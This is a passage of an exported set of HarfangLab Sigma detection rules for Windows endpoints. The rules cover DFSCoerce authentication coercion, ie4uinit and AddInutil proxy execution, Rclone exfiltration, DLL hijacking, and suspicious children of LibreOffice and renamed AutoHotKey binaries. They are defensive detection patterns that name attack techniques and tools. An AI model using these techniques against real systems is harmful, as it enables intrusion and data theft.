"https://github.com/Wh04m1001/DFSCoerce",
"https://attack.mitre.org/techniques/T1187/"
],
"name": "t1187_dfscoerce.yml",
"content": "title: Possible DFSCoerce Attempt\nid: 59bfb123-6127-40af-9574-1ce62826ec93\ndescription: |\n Detects attempts to add or remove a DFS namespace root on a domain controller, which can be indicative of a DFSCoerce attack.\n DFSCoerce is an authentication coercion technique, typically chained with NTLM relay, that abuses the MS-DFSNM protocol to force a Domain Controller into authenticating to an attacker-controlled server; relaying that authentication can allow an unauthorised user to escalate privileges to domain admin.\n The two RPC methods 'NetrDfsRemoveStdRoot' and 'NetrDfsAddStdRoot' can be used to coerce a host to authenticate to an arbitrary server.\n It is recommended to check the server name, its IP address and the root share name recorded in the event, and to confirm whether a DFS namespace change was expected, to determine the legitimacy of this action.\nreferences:\n - https://www.praetorian.com/blog/how-to-detect-dfscoerce/\n - https://github.com/Wh04m1001/DFSCoerce\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/06/13\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1187\n - classification.Windows.Source.EventLog\n - classification.Windows.HackTool.DFSCoerce\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.ActiveDirectory\nlogsource:\n product: windows\n category: eventlog\ndetection:\n selection:\n LogName: 'Microsoft-Windows-DFSN-Server/Admin'\n EventID:\n - 515 # NetrDfsRemoveStdRoot\n - 514 # NetrDfsAddStdRoot\n AgentOsProductType: 'server dc'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59bfb123-6127-40af-9574-1ce62826ec93",
"rule_name": "Possible DFSCoerce Attempt",
"rule_description": "Detects attempts to add or remove a DFS namespace root on a domain controller, which can be indicative of a DFSCoerce attack.\nDFSCoerce is an authentication coercion technique, typically chained with NTLM relay, that abuses the MS-DFSNM protocol to force a Domain Controller into authenticating to an attacker-controlled server; relaying that authentication can allow an unauthorised user to escalate privileges to domain admin.\nThe two RPC methods 'NetrDfsRemoveStdRoot' and 'NetrDfsAddStdRoot' can be used to coerce a host to authenticate to an arbitrary server.\nIt is recommended to check the server name, its IP address and the root share name recorded in the event, and to confirm whether a DFS namespace change was expected, to determine the legitimacy of this action.\n",
"rule_creation_date": "2025-06-13",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1187"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59c50f51-8b62-4a82-872d-9ce2c6519792",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087722Z",
"creation_date": "2026-03-23T11:45:34.087724Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087729Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/",
"https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_ie4uinit_proxy_execution.yml",
"content": "title: Proxy Execution via ie4uinit\nid: 59c50f51-8b62-4a82-872d-9ce2c6519792\ndescription: |\n Detects an execution of ie4uinit.exe in an unusual folder.\n The Windows binary ie4uinit.exe can be used to execute code from a maliciously crafted ie4uinit.inf file.\n Adversaries can use this utility to proxy the execution of malicious code and make their actions stealthier.\n It is recommended to investigate the ie4uinit.inf file in the ie4uinit.exe folder and any other malicious activities on the machine.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\n - https://thedfirreport.com/2024/12/02/the-curious-case-of-an-egg-cellent-resume/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2024/12/03\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Ie4uinit\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'Ie4uinit.exe'\n\n filter_legitimate:\n Image:\n - '?:\\windows\\system32\\ie4uinit.exe'\n - '?:\\windows\\sysWOW64\\ie4uinit.exe'\n\n exclusion_iVMS:\n CommandLine: '?:\\Users\\\\*\\AppData\\Local\\Temp\\InstallationTempFile\\ie4uinit.exe -ClearIconCache'\n Ancestors|contains: '\\iVMS-4200V'\n\n exclusion_hikvision:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\InstallationTempFile\\ie4uinit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Hangzhou Hikvision Digital Tech.Co.,Ltd'\n\n exclusion_ossia:\n ProcessImage:\n - '?:\\Program Files (x86)\\Ossia VMS Standard\\Client\\ie4uinit.exe'\n - '?:\\Program Files (x86)\\Ossia VMS Standard\\Server\\ie4uinit.exe'\n\n exclusion_safire:\n ProcessImage:\n - '?:\\Program Files (x86)\\Safire Smart VMS lite\\Client\\ie4uinit.exe'\n - '?:\\Program Files (x86)\\Safire Smart VMS 
lite\\Server\\ie4uinit.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Chipspoint Electronics Co., Ltd.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59c50f51-8b62-4a82-872d-9ce2c6519792",
"rule_name": "Proxy Execution via ie4uinit",
"rule_description": "Detects an execution of ie4uinit.exe from a location other than the Windows System32 or SysWOW64 directories.\nThe Windows binary ie4uinit.exe can be used to execute code from a maliciously crafted ie4uinit.inf file placed alongside it.\nAdversaries can copy this utility elsewhere to proxy the execution of malicious code and make their actions stealthier.\nIt is recommended to investigate the ie4uinit.inf file in the ie4uinit.exe folder, how the binary was placed there, and any other malicious activities on the machine.\n",
"rule_creation_date": "2024-12-03",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59d486f3-7e80-472f-ba5f-6094fb3585d9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611170Z",
"creation_date": "2026-03-23T11:45:34.611174Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611181Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://redcanary.com/blog/rclone-mega-extortion/",
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://attack.mitre.org/techniques/T1567/002/"
],
"name": "t1567_002_suspicious_rclone.yml",
"content": "title: Suspicious Rclone Execution\nid: 59d486f3-7e80-472f-ba5f-6094fb3585d9\ndescription: |\n Detects an execution of Rclone with a remote destination or command-line flags often seen in exfiltration scenarios.\n Attackers can use Rclone to exfiltrate data to an external server before deploying ransomware.\n It is recommended to investigate the remote destination specified in the Rclone command line (and in any configuration file passed via --config, where the actual endpoint may be defined), as well as which data was copied, to determine whether this action was legitimate.\nreferences:\n - https://redcanary.com/blog/rclone-mega-extortion/\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://attack.mitre.org/techniques/T1567/002/\ndate: 2021/09/30\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1567.002\n - attack.t1048.002\n - attack.t1048.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Rclone\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_rclone:\n - OriginalFileName: 'rclone.exe'\n - Image|endswith: '\\rclone.exe'\n\n selection_variant_suspicious_destination:\n CommandLine|contains:\n - 'ftp:'\n - 'sftp:'\n - 'remote:'\n - 'mega:'\n - 'gdrive:'\n - 'pcloud:'\n - 'dropbox:'\n - 's3:'\n - 'webdav:'\n\n selection_variant_suspicious_flags:\n CommandLine|contains:\n - '--config'\n - '--no-check-certificate'\n\n condition: selection_rclone and 1 of selection_variant_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59d486f3-7e80-472f-ba5f-6094fb3585d9",
"rule_name": "Suspicious Rclone Execution",
"rule_description": "Detects an execution of Rclone with a remote destination or command-line flags often seen in exfiltration scenarios.\nAttackers can use Rclone to exfiltrate data to an external server before deploying ransomware.\nIt is recommended to investigate the remote destination specified in the Rclone command line (and in any configuration file passed via --config, where the actual endpoint may be defined), as well as which data was copied, to determine whether this action was legitimate.\n",
"rule_creation_date": "2021-09-30",
"rule_modified_date": "2025-02-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048.002",
"attack.t1048.003",
"attack.t1567.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59d4b297-7e16-4785-93bf-77aa4203d81b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085337Z",
"creation_date": "2026-03-23T11:45:34.085339Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_suspicious_addinutil_child_process.yml",
"content": "title: Suspicious Process Spawned by AddInutil.exe\nid: 59d4b297-7e16-4785-93bf-77aa4203d81b\ndescription: |\n Detects an unusual process spawned by the Add-In deployment cache updating utility (AddInutil.exe).\n Adversaries can use this utility to proxy the execution of malicious code, in an attempt to evade defenses.\n It is recommended to investigate the process spawned by AddInutil.exe and other potentially malicious activities on the machine.\nreferences:\n - https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/10/27\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.AddInutil\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'AddInUtil.exe'\n\n exclusion_conhost_1:\n OriginalFileName: 'conhost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_conhost_2:\n OriginalFileName: 'conhost.exe'\n CommandLine: '\\\\?\\?\\\\?:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1'\n\n exclusion_werfault:\n OriginalFileName: 'werfault.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_dw20:\n Image: '?:\\Windows\\Microsoft.NET\\Framework64\\v*\\dw20.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59d4b297-7e16-4785-93bf-77aa4203d81b",
"rule_name": "Suspicious Process Spawned by AddInutil.exe",
"rule_description": "Detects an unusual process spawned by the Add-In deployment cache updating utility (AddInutil.exe).\nAdversaries can use this utility to proxy the execution of malicious code, in an attempt to evade defenses.\nIt is recommended to investigate the process spawned by AddInutil.exe and other potentially malicious activities on the machine.\n",
"rule_creation_date": "2023-10-27",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "59d8e544-4173-4f01-8db4-a19927dc54d0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091038Z",
"creation_date": "2026-03-23T11:45:34.091040Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091044Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_systempropertiescomputername.yml",
"content": "title: DLL Hijacking via systempropertiescomputername.exe\nid: 59d8e544-4173-4f01-8db4-a19927dc54d0\ndescription: |\n Detects potential Windows DLL Hijacking via systempropertiescomputername.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library (its path, signature and content) and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'systempropertiescomputername.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\bcd.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "59d8e544-4173-4f01-8db4-a19927dc54d0",
"rule_name": "DLL Hijacking via systempropertiescomputername.exe",
"rule_description": "Detects potential Windows DLL Hijacking via systempropertiescomputername.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a4a2c76-7d1f-47d1-8b34-2294c67ad00e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595372Z",
"creation_date": "2026-03-23T11:45:34.595375Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595383Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1204/002/",
"https://attack.mitre.org/techniques/T1566/"
],
"name": "t1204_002_libreoffice_application_spawning_malicious_processes.yml",
"content": "title: Dangerous Process Started by LibreOffice Application\nid: 5a4a2c76-7d1f-47d1-8b34-2294c67ad00e\ndescription: |\n Detects various potentially malicious binaries started from LibreOffice applications.\n Attackers heavily use phishing attacks to gain access to a victim's system, and they often result in the execution of code by application reading the infected documents.\n It is recommended to investigate actions taken by the started process, as well as the opened document by LibreOffice at the time of detection.\nreferences:\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1204/002/\n - https://attack.mitre.org/techniques/T1566/\ndate: 2022/07/04\nmodified: 2025/04/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.t1204.002\n - attack.initial_access\n - attack.t1566\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_parent:\n ParentImage|endswith: '\\soffice.bin'\n\n selection_image:\n - Image|endswith:\n # cmd + scripts\n - '\\cmd.exe'\n - '\\powershell.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n # persistence\n - '\\schtasks.exe'\n - '\\regsvr32.exe' # lolbas squiblydoo\n - '\\wmic.exe' # use wmic to spawn PowerShell or else under wmiprvse or squiblytwo\n - '\\mshta.exe'\n - '\\rundll32.exe'\n - '\\msiexec.exe'\n - '\\msbuild.exe' # https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml\n - '\\AppVLP.exe' # lolbas : https://lolbas-project.github.io/lolbas/OtherMSBinaries/Appvlp/\n # handle renamed binaries\n - OriginalFileName:\n - 'Cmd.Exe'\n - 'PowerShell.EXE'\n - 'cscript.exe'\n - 'wscript.exe'\n - 'schtasks.exe'\n - 'REGSVR32.EXE'\n - 'wmic.exe'\n - 'MSHTA.EXE'\n - 'RUNDLL32.EXE'\n - 'msiexec.exe'\n - 'MSBuild.exe'\n - 
'appvlp.exe'\n\n exclusion_hp:\n CommandLine|contains: '?:\\windows\\system32\\spool\\DRIVERS\\x64\\3\\hpmsn???.dll'\n\n exclusion_ver:\n CommandLine:\n - '?:\\windows\\system32\\cmd.exe /c ver'\n - '?:\\windows\\system32\\cmd.exe /c cmd /c ver'\n - '?:\\windows\\system32\\cmd.exe /c command /c ver'\n\n exclusion_tex:\n CommandLine|contains|all: 'AppData\\Roaming\\LibreOffice\\\\*\\user\\TexMaths\\'\n\n exclusion_ndfapi:\n CommandLine: '?:\\WINDOWS\\system32\\rundll32.exe ndfapi.dll,NdfRunDllDiagnoseWithAnswerFile NetworkDiagnosticsSharing ?:\\Users\\\\*\\AppData\\Local\\Temp\\NDF*.tmp'\n\n exclusion_wmic:\n CommandLine:\n - 'cmd /C WMIC bios get serialnumber'\n - 'cmd /C WMIC computersystem get manufacturer'\n - 'cmd /C WMIC computersystem get model'\n - 'cmd /C WMIC computersystem get TotalPhysicalMemory'\n - 'cmd /C WMIC cpu get DeviceID'\n - 'cmd /C WMIC cpu get manufacturer'\n - 'cmd /C WMIC cpu get MaxClockSpeed'\n - 'cmd /C WMIC cpu get Name'\n - 'cmd /C WMIC cpu get NumberOfCores'\n - 'cmd /C WMIC cpu get NumberOfLogicalProcessors'\n\n exclusion_officeaddin:\n CommandLine:\n - 'regsvr32 /s /n /i:OnPrinterAccess ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\UDCOfficeAddin*.dll'\n - 'regsvr32 /s /n /i ?:\\WINDOWS\\system32\\spool\\DRIVERS\\x64\\3\\UDCOfficeAddin*x64.dll'\n\n exclusion_rundll32:\n CommandLine|contains:\n - 'rundll32.exe ?:\\Program Files\\'\n - 'rundll32.exe ?:\\Program Files (x86)\\'\n - 'rundll32.exe ?:\\Windows\\system32\\url.dll,MailToProtocolHandler mailto:'\n - 'runDll32.exe ?:\\Windows\\system32\\hotplug.dll,HotPlugSafeRemovalDriveNotification'\n - 'rundll32.exe ?:\\WINDOWS\\SYSTEM32\\SPOOL\\DRIVERS\\X64\\\\*\\\\*.DLL'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a4a2c76-7d1f-47d1-8b34-2294c67ad00e",
"rule_name": "Dangerous Process Started by LibreOffice Application",
"rule_description": "Detects various potentially malicious binaries started from LibreOffice applications.\nAttackers heavily use phishing attacks to gain access to a victim's system, and these attacks often result in code execution by the application that opens the infected document.\nIt is recommended to investigate the actions taken by the started process, as well as the document LibreOffice had open at the time of detection.\n",
"rule_creation_date": "2022-07-04",
"rule_modified_date": "2025-04-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access"
],
"rule_technique_tags": [
"attack.t1203",
"attack.t1204.002",
"attack.t1566"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a4a7014-732a-4c1b-ab75-89991844df42",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080461Z",
"creation_date": "2026-03-23T11:45:34.080463Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080467Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/",
"https://attack.mitre.org/techniques/T1036/"
],
"name": "t1036_suspicious_renamed_autohotkey_binary.yml",
"content": "title: Suspicious Renamed AutoHotKey Binary\nid: 5a4a7014-732a-4c1b-ab75-89991844df42\ndescription: |\n Detects the execution of a renamed AutoHotKey binary.\n Adversaries may execute AutoHotKey scripts in order to conduct malicious operations and deliver more advanced malware.\n It is recommended to check the content of the executed script which is passed on the command-line for malicious purposes.\nreferences:\n - https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\n - https://attack.mitre.org/techniques/T1036/\ndate: 2024/03/22\nmodified: 2025/07/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.AutoHotkey\n - classification.Windows.Behavior.Masquerading\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - OriginalFileName: 'AutoHotKey.exe'\n - Product|contains: 'AutoHotkey'\n\n filter_name:\n Image|endswith:\n - '\\AutoHotkey.exe'\n - '\\AutoHotkey-windows-*.exe'\n - '\\AutoHotkeyA32.exe'\n - '\\AutoHotkeyU32.exe'\n - '\\AutoHotkeyU64.exe'\n - '\\AutoHotkey32.exe'\n - '\\AutoHotkey64.exe'\n - '\\AutoHotkey32_UIA.exe'\n - '\\AutoHotkey64_UIA.exe'\n - '\\AutoHotkeyU32_UIA.exe'\n - '\\AutoHotkeyU64_UIA.exe'\n - '\\AutoHotkey_*_setup*.exe' # AutoHotkey_2.0.11_setup.exe\n - '\\AutoHotkey *.exe' # AutoHotkey 1.1.37.02.exe\n - '\\\\*-AutoHotkey_*_setup.exe'\n - '\\AutoHotkeyUX.exe'\n - '\\AutoHotFlow.exe'\n - '\\AutoHotkeyLKL.exe'\n - '\\lintalist.exe'\n - '\\LLM AutoHotkey Assistant.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5a4a7014-732a-4c1b-ab75-89991844df42",
"rule_name": "Suspicious Renamed AutoHotKey Binary",
"rule_description": "Detects the execution of a renamed AutoHotKey binary.\nAdversaries may execute AutoHotKey scripts in order to conduct malicious operations and deliver more advanced malware.\nIt is recommended to inspect the content of the executed script, which is passed on the command line, for malicious purposes.\n",
"rule_creation_date": "2024-03-22",
"rule_modified_date": "2025-07-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5a7758ea-0069-4dd5-9f5d-4d478a464ae5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094030Z",
"creation_date": "2026-03-23T11:45:34.094032Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094036Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1555/001/"
],
"name": "t1555_001_system_keychain_access_suspicious_process_macos.yml",
